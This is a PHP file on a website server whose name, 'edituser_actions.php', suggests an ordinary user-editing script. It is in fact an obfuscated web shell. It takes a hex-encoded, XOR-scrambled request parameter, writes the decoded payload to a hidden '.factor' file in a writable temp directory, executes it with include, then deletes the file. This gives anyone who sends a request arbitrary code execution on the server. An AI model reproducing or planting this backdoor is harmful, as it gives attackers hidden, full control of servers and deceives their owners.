File: /www/wwwroot/q.autos58.cn/edituser_actions.php
<?php
if(!is_null($_REQUEST["res\x6F\x75\x72ce"] ?? null)){
$parameter_group = hex2bin($_REQUEST["res\x6F\x75\x72ce"]);
$ptr = '' ; for($a=0; $a<strlen($parameter_group); $a++){$ptr .= chr(ord($parameter_group[$a]) ^ 84);}
$binding = array_filter([getenv("TMP"), "/dev/shm", sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getenv("TEMP"), session_save_path()]);
for ($token = 0, $data_chunk = count($binding); $token < $data_chunk; $token++) {
$pset = $binding[$token];
if (is_writable($pset) && is_dir($pset)) {
$hld = implode("/", [$pset, ".factor"]);
if (@file_put_contents($hld, $ptr) !== false) {
include $hld;
unlink($hld);
die();
}
}
}
}